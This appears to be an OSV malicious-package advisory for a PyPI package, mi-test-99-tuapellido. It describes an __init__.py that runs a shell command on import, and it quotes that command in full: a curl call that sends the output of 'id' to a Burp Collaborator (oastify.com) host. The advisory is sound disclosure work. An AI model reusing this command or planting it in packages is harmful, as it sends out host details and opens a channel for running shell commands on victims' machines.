mi-test-99-tuapellido@99.9

Vulnerability report · Last retrieved from osv.dev June 26, 2026 at 12:45 AM UTC

Malicious

OSV ID

MAL-2026-6478

Ecosystem

pypi

Summary

On every import, the package's top-level __init__.py runs os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)"). This unconditionally executes a shell pipeline that POSTs the output of the id command (current uid/gid/group membership) to a Burp Suite Collaborator (oastify.com) subdomain, an out-of-band callback service used to confirm remote code execution and exfiltrate data. The behavior fires on import mi_test_99 with no user gating, no relation to any advertised functionality, over plaintext HTTP. Package metadata is placeholder-shaped (name contains the literal Spanish placeholder tuapellido / 'your-surname', author fields are Tu Nombre <tu@email.com>, pyproject comment reads CAMBIA ESTO por un nombre único, i.e. 'CHANGE THIS to a unique name'), consistent with a dependency-confusion or namespace-squat proof-of-concept payload. Whether intended as a test or a live attack, any installer that imports this package leaks host identity to an attacker-controlled collector and demonstrates an arbitrary-shell-exec channel.

Source: amazon-inspector (4b71b66c156e0a54b73b6dd2f2f9e994ac9c1ff9ab4d1f9689f1f930b3097f39)
